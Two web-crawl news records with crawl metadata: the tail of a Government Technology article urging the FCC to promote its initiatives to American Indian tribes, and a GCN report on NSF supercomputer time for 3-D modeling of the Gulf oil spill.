The ultimate success of these FCC initiatives, then, may be determined by how well the agency succeeds in getting the word out to tribes. So far it has posted extensive Web-site data and organized a couple of well-received conferences in St. Paul and Palo Alto to spread the news. But by allocating a small portion of available funds to promote the initiatives directly to all American Indian communities, the FCC could probably magnify the results by a significant margin. | <urn:uuid:c9fc8212-0706-4092-9abb-f128c6b1f676> | CC-MAIN-2017-04 | http://www.govtech.com/magazines/gt/Tech-Challenges-On-The-Reservation.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560279410.32/warc/CC-MAIN-20170116095119-00487-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.956636 | 1,935 | 2.90625 | 3 |
Supercomputer tapped for 3D models of oil spill
Effort will focus on the inland effects of oil
The National Science Foundation has made an emergency allocation of 1 million compute-hours on a supercomputer at the Texas Advanced Computing Center at the University of Texas to create 3-D models of the spreading oil spill in the Gulf of Mexico, according to published reports.
"The goal of this effort is to produce models that can forecast how the oil may spread in environmentally sensitive areas by showing in detail what happens when it interacts with marshes, vegetation and currents," wrote Patrick Thibideau in Network World.
What may be as important are models that forecast what might happen if a hurricane carries the oil miles inland, he added in his article. NSF is funding the use of the Texas computing power for the modeling.
The computer models currently available are not detailed enough to show just what happens as the oil nears the coast line, said Rick Luettich in the article. Luettich is a professor of marine sciences and head of the Institute of Marine Sciences at the University of North Carolina in Chapel Hill, and one of the researchers on this project.
"I don't think that they have any idea how this oil is predicted to move through the marshes and the nearshore zone," said Luettich.
Connect with the GCN staff on Twitter @GCNtech. | <urn:uuid:99d650d4-ceb1-45e4-b3ae-8d8b9822c0ef> | CC-MAIN-2017-04 | https://gcn.com/articles/2010/05/26/supercomputer-to-make-3d-oil-spill-models.aspx | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560279410.32/warc/CC-MAIN-20170116095119-00487-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.960887 | 283 | 3.0625 | 3 |